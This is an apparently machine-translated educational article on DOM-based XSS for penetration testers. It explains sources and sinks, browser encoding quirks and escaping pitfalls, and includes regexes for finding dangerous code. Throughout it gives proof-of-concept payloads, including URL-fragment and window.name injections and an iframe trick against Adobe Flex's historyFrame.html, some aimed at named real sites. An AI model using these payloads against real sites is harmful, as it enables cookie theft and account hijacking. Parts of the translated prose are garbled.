Looking for loopholes: DOM Based XSS Guide

XSS is not without reason at the top of the list of hazards OWASP TOP 10. Any intelligent programmer knows about them. But this does not prevent statistics: eight out of ten web applications have XSS vulnerabilities. And if you recall the personal experience of pentest banks, then the picture “ten out of ten” seems more realistic. It seems that the topic has been moved away from and to, but there is a subspecies of XSS, which has been lost for various reasons. This is a DOM Based XSS. And just about him today I am writing.

Focus offset

Attacks against clients represent one of the main problems in web security. XSS, Clickjacking, CSRF - all of them are directed against ordinary users, and not against the server components of the systems. And if earlier it was possible to get a decent profit by exploiting vulnerabilities in the server part (and penetrating into the corporate network), now the focus of hackers is shifting to the client side. For this reason, XSSs, which are widely regarded with skepticism, can serve well.
')

What you can skip

First, I will make two explanations related to this article. First. The main goal is to introduce to DOM Based XSS those people who have so far bypassed this type of vulnerability. Tell about the intricacies of operation, as well as share thoughts on how to properly put the process of identifying such vulnerabilities. This is a kind of educational program. Therefore, depending on your knowledge, you can skip this or that piece. Now the second. About half a year ago, Vladimir Kochetkov wrote an excellent article on Habré, “ The whole truth about XSS, or why cross-site scripting is not a vulnerability? ". It dealt with the fact that XSS is an attack, not a type of vulnerability. I remember that it inflamed a number of fierce disputes and “crusades”, which is very amusing ... But I will call XSS both attack and vulnerability, although the statement “XSS is a type of attack” is true. So it will be easier, although correctly understand the meaning, of course, important.

Alphabet XSS

I can not remind you why we need XSS'ki. No, not to execute our user JavaScript code. For this purpose, we can simply drag it onto a site that is completely under our control (http://evil.com).

The task is to execute OUR JavaScript code in the user's browser in the context of the attacked domain (for example, in the context of gmail.com). That is, the goal is to bypass the Same Origin Policy, because almost all browser security is on the SOP.

Further, what XSS will give us? Of course, in the simplest case, we just get user session cookies. But in fact, we can do everything that JavaScript can: control what is displayed on the page and what is sent to the server, emulate user actions, steal data from the molds ... It is important to understand that XSS, depending on the situation and skill, can become a powerful weapon. Now about the classification. Usually distinguished "stored" ("stored XSS" or "Type 2") and "reflected" ("reflected XSS" or "Type 1"). In the stored we send XSS-ku, and it is stored on the server, and then we send users to this page. In the "reflected", our XSS returns in the body of the response from the server to a specific request from the XSS itself. But something is missing here. And as you probably guessed, this is the topic of today's article DOM Based XSS (or Type 0). For various reasons (some of which will be described below), this type of XSS is little known, even in our circles ... Perhaps this is due to the fact that they are not often scanned by scanners. But let's move on to the theory.

What is DOM Based XSS?

To answer a question, you must first understand what the DOM is. I'll start from afar, from my favorite topic - XML. For XML there are two main types of parsers. The first is SAX (Simple API for XML) - this is a type of parsers with sequential processing of documents. It reads the element and generates events. Requires few resources, but very simple. The second, the DOM (Document Object Model), completely loads the entire document into memory and presents it as a tree. But more importantly, it allows you to completely manipulate it. You can add, delete, change the structure, the elements (nodes) themselves and their attributes. And what have XML? Moreover, for some time now HTML is a subtype of XML. In general, this concept is used in browsers. All received HTML-document from the server is represented as a DOM-tree in the browser, and in addition, it is possible to change it using the standard API through a particular language. In our case, this is basically JavaScript.DOM consists of objects nested into each other in a hierarchical order, which are called nodes. Each node in the structure represents an HTML element on the page. The root element is document. The value stored in the nodes is text. In addition, nodes have attributes that can also be accessed. In fig. 1 shows the simplest HTML file, as well as the hierarchy that the browser creates. More detail you can read about the DOM and try on examples with JavaScript here: goo.gl/suiZE .

Fig. 1. The simplest DOM tree

And, as already mentioned, we have the ability to manipulate DOM from JavaScript. And what does this give us? In certain cases, using these methods (if the data is incorrectly filtered), we can modify the DOM of the attacked site and achieve the execution of our JavaScript code in the context of the attacked site. That is, the essence is the same XSS. The simplest example is:

<body> <script>document.write(location.href);</script> </body>

Having received such HTML, the browser will execute the JavaScript code and add a string to the body of the page (document.write), taking its value from location.href. The problem here is that a hacker can control the value of location.href and insert his javascript, which will also be executed. That is, if this page is test.html, then in order to add our code, we need our victim to go to the following URL (see Figure 2):

 http://victim.com/test.html#<script>alert(document.cookie);</script>

Fig. 2. DOM Based XSS

Fig. 2.1. Classic DOM Based XSS

It is important to note here that in Firefox this example will not work. For IE and Chrome, it is necessary to follow the link, and not just write a script in the address bar, since in the second case everything will be behind the URL before execution of the code (it will look like "% 3Cscript% 3Ealert (1);% 3C / script% 3E") . But the second example will be working for everyone:

 <body> <script> var l = location.hash.slice(1); eval(l); </script> </body>

Exploitation:

 http://victim.com/test_eval.html#alert(document.cookie)

The XSS version is a little more non-standard:

 <body> <p>Hello my window name is: <script>document.write(window.name);</script> </p> </body>

Operation (we open the victim's page from ours so that we can control window.name) - fig. 3:

 <script>window.open("http://victim.com/test_window.html", "<script>alert('XSS')</scr" + "ipt>", "", false);</script>

I hope it became clear where the legs grow for the DOM XSS.

Fig. 3. DOM Based XSS from window.name

Terminology?

The attack itself, oddly enough, is very bearded. At least in 2005, Amit Klein (Amit Klein, goo.gl/OOb3U ) wrote a sensible idea about the third kind of XSS, although the DOM XSS itself had already been found before that. In his work a certain list was presented of where the data from the user could come from (Fig. 4) and which dangerous functions could lead to XSS (Fig. 5). But, oddly enough, the theme has been developed and rethought in recent years - thanks in large part to people like Stefano Di Paola and Mario Heiderich.

Fig. 4. From where ...

Fig. 5. Where ...

Most importantly, a certain terminology has been developed - what we control and can pass to the page is called “source”, and the result is where the data comes in, the dangerous functions with which we can attack and operate our XSS, are called “ sink I will not even try to search for Russian analogues of terms. And if the sinks have not changed much (supplemented), the understanding of sources has grown greatly, which somewhat changes the understanding of the attack (its classification), but more on that later. It is important to understand here what is what in principle. Details too much. So, one of the most significant resources when digging DOM XSS will be the domxsswiki project ( goo.gl/yycvJ ), which lists the main sources and sinks, as well as their subtleties in the context of various browsers. So, about the new classification that Aspect Security recently introduced (as trolling, probably) - see fig. 6. This classification is precise and underlines the essence of the DOM XSS. No matter where the input data from the attacker comes from (from a specific server response, from the client, from the static part of the page) - it is important that they are used in critical functions by the client part. For example, imagine a situation that we can send your nickname to the server and it will be stored somewhere there - the potential for Stored XSS is. But if filtering hinders us, it would seem that we cannot do anything already. And if our nickname is used somewhere else, but already in the context of the client side and is used somewhere to modify DOM? It turns out that we have a second attempt for XSS'ki (now DOM XSS), because perhaps we don’t need those characters that were needed for Stored XSS, but were filtered on the server.

Fig. 6. New classification?

Fig. 7. New version of source types changes classification

Fig. 8. From (new version) ...

What is the essence of this part? To make you understand that there are important general concepts, but the DOM XSS is a very specific and non-trivial in many ways.

DOM XSS Specificity

So, after a general reflection on the topic and a few examples, what can we isolate specific in the DOM XSS? First, the DOM XSS is first of all the problem of the client side of the web application. I will clarify: this is not a client problem, but a problem of the client part of the application. This is incorrect filtering / use of data obtained from untrusted sources in the client part of the web application, that is, mainly in JavaScript. This item has several consequences. DOM XSS can be on “any” page, even on plain HTML, if JavaScript is used there. Previously, the search for vulnerabilities focused on scripts, on pages where we could enter some data, as well as pages where we got the result, - while the static pages were not interesting as such. Now, even “static” can bring vulnerability. Often enough for the DOM XSS, we don’t need to send XSS to the server at all. The three examples above are proof of this. For the first two examples, it is important to note that browsers (according to standards) do not send to the server what is after the “#” symbol. This Fragment identifier is a special part of the URI scheme used initially to create links to parts of the document. Wiki example: “http://www.example.org/foo.html#bar” refers to an element with id = bar on the foo.html page. Its trick is that it is not sent to the server, but is available from JavaScript. Such an identifier is constantly used in web 2.0 sites (the Gmail service is an example). So, the “http://victim.com/test.html#” from the first example will force the browser to make a request to test.html, but without XSS, in js there will be a full line. And no means of server protection (user data filtering, all kinds of WAF or IPS) will work. The problem lies mainly in the client side of the web application. This is the first point. Secondly, we, as a rule, cannot use the standard techniques and tools that we use to identify classic XSS and SQL injections, since they are designed specifically to identify server problems. Thirdly, although we, in fact, have the ability to access the source code (JavaScript is delivered to the client), but to properly and deeply look for such vulnerabilities is a very trivial task. Subtleties and tricks - even dig a shovel :).

Difficulties and fishes

So, in the course of the last point, I want to give an illustrative picture from the presentation by Stefano Di Paola (Fig. 9). Analyzing JavaScript is a terrible thing, especially with standard tools. Yes, Mario Heiderich wrote two regexps to identify the main sink and source:

 /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/ /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/

But you have to go through the entire dataflow to understand where it comes from and what it takes, where and how it gets ... Not only that, besides searching for a potential DOM XSS vulnerability, you also need to write an exploit for it. And browsers are different, and, worse, their behavior is different. Not to mention the fact that browsers have a means of countering reflected XSS'kam - and they also have to be bypassed. If you take the first example and the value in location.href, then it contains the URL (general idea):

 scheme://user:pass@host/path/to/page.ext/Pathinfo;semicolon?search.location=value#hash=value&hash2=value2

And browsers have different urlencod URLs. Firefox, for example, encodes <> characters after #, but IE does not encode .IE:

 http://host/path/to/page.ext/test%3Ca%22'%0A%60=%20+%20%3E;test%3Ca%22'%0A%60=%20+%20%3E?test<a"'%0A`=%20+%20>;#test<a"'%0A`=%20+%20>;

FF:

 http://host/path/to/page.ext/test%3Ca%22%27%0A%60=%20+%20%3E;test%3Ca%22%27%0A%60=%20+%20%3E?test%3Ca%22%27%0A%60=%20+%20%3E;#test%3Ca%22%27%0A%60=%20+%20%3E;

Because the first attack will be suitable only for IE, Chrome. At the same time, if the vulnerable page had the code

 <body> <script>document.write(location.hash);</script> </body> <!--  location.hash  location.href -->

then the exploit would work in all browsers, since FF for this object stores the value in decoded form. Next, another example of browser tricks. There is, for example, a vulnerable page that adds to the script only the server name from the referer:

 document.write('<script src="http://Host/image.gif?t='+(referrer.split("/")[2])+'></script>');

It would seem that there can be done? Yes, we can influence referer! All we need is to lure the user to our site and redirect it from the page we need to vulnerable. Thus, we will affect the referer field. But here, it seems, a bummer begins ... But no. Stefano found out that IE supports special characters in the host name. That is, we can create a subdomain in ".evil.com" or, as in the example of Stefano, "" onreadystatechange = eval (name) .attacker.com ". In addition to browser pieces and native JavaScript code differences, there are also various JS frameworks which is used more than everywhere. The same jQuery has a lot of wrappers over standard sinks (see fig. 10).

Fig. 9. JavaScript analysis is a thankless task

Fig. 10. jQuery and other frameworks make analysis more difficult.

Bypass filters

Hopefully, an understanding regarding DOM XSS has begun to appear. Now indirectly touch protection. Of course, the simplest option is to refuse JS on the client side :). But it is clear that this is unreal. The next option is not to use the safe functions of changing the DOM, as well as implement filtering of user data ... But, as you probably noticed, the DOM XSS is the same Temka. It’s like some kind of colorful, bubbling essence that has no particular boundaries. Therefore, there is no understanding of the sensible among the masses, and therefore, from the point of view of error protection, many are allowed. Not so long ago I read an excellent article , which we will now examine. It describes two examples of “safe” DOM changes by using filtering of user data. Example 1. Using element.textContent, which is used to set / read the text value of a node. Used also for filtering HTML. For example:

 var div = document.createElement('div'); div.innerHTML = 'Hello <a href="http://bob.com">Bob</a>!'; console.log(div.textContent); // Hello Bob!;

Here div.textContent cut out “ Bob ” when adding an element. It seems to be safe and we can not add XSS? And no. This method has a feature: it converts the HTML entity back to HTML:

 var div = document.createElement('div'); div.innerHTML = 'Hello <a>&lt;script&gt;alert(&quot;!&quot;)&lt;/script&gt;</a>!'; console.log(div.textContent); // Hello <script>alert("!")</script>!

That is, with minor frauds, we can simply implement XSS'ku. If we use this method in a slightly different order.

 var div = document.createElement('div'); div.textContent = '<span>Foo & bar</span>'; console.log(div.innerHTML) // &lt;span&gt;Foo &amp; bar&lt;/span&gt;

then it will again seem to be a completely safe result. The author notes that document.createTextNode has a similar behavior. The characters <,>, & were replaced with the corresponding entities. And this method is also used for "filtering". But you probably noticed that there is no important enough character in the filter - the quotation mark. And this fact from the theory of classic XSS reminds us of the possibility of operating XSS on the basis of events (event), which the author shows by example:

 function escapeHtml(str) { var div = document.createElement('div'); div.appendChild(document.createTextNode(str)); return div.innerHTML; }; var userWebsite = '" onmouseover="alert(\'derp\')" "'; var profileLink = '<a href="' + escapeHtml(userWebsite) + '">Bob</a>'; var div = document.getElementById('target'); div.innerHtml = profileLink; // <a href="" onmouseover="alert('derp')" "">Bob</a>

Oddly enough, the problem stretches and "flows" into other solutions. For example, jQuery has the same features in .text (). In addition, some filtering information can be found in the same domxsswiki.

Reality

A couple of examples. Firstly, the classic version, which was found on Twitter: e: XSS, oddly enough, was trivial:

 http://twitter.com/#!javascript:alert(document.domain);

There is a substitution of the pseudo-jander javascript in the location and, as a result, the execution of our code. A modern example from the AVG site:

 //display the correct tab based on the url (#name) var pathname = $(location).attr('href');var urlparts = pathname.split("#");

Operation is again trivial:

 http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/xss/);>

Further, a slightly more strange example, when it seems that the vulnerability is close, but it is not easy to exploit it. This vulnerability was found in Adobe Flex 3. The vulnerable page - / history / historyFrame.html - is still massively on the web (including on “powerful” portals).

 function processUrl() { var pos = url.indexOf("?"); url = pos != -1 ? url.substr(pos + 1) : ""; if (!parent._ie_firstload) { parent.BrowserHistory.setBrowserURL(url); try { parent.BrowserHistory.browserURLChange(url); } catch(e) { } } else { parent._ie_firstload = false; } } var url = document.location.href; processUrl(); document.write(url);

If you look at the last lines, it seems - XSS here, on a silver platter. But no, there is a problem - checks the parent._ie_firstload in the processUrl function. Directly do not exploit the vulnerability - javascript just does not reach the right place. Since the page does not have such an object as parent, then JavaScript will fly to “parent.BrowserHistory.setBrowserURL (url);”. But we can cheat and create a page on our website that will contain two frames:

 <html> <body> <iframe name="_ie_firstload"></iframe> <iframe src="http://www.vuln.site/app/history/historyFrame.html?#<script>alert('xss')</script>"></iframe> </body> </html>

Thus, we create a frame to which the code from the vulnerable page will be accessed as a result of the “if (! Parent._ie_firstload)” check. And since now some object already exists, the check falls on Else and the function successfully completes, giving you the opportunity to start the DOM XSS. But this method also has its subtleties. For example, FF prohibits contacting a parent from another domain, and therefore, according to the author’s experience, you could only use it against IE. If you are interested in the DOM XSS theme, you should look at other examples to gain experience: goo.gl/ZWei3 , goo .gl / gZawa , goo.gl/XRwBT , goo.gl/plqs9 .

Afterword

Perhaps, I repeat, but, summing up, I would like to say that the DOM Based XSS is the still incomprehensible animal. And the more incomprehensibility and subtleties - the more bugs. Especially given the fact that JavaScript is increasingly “pulling the blanket over itself,” and the web is becoming more and more dynamic. In general, learning is light, and creating is wonderful :). Successful perecherv!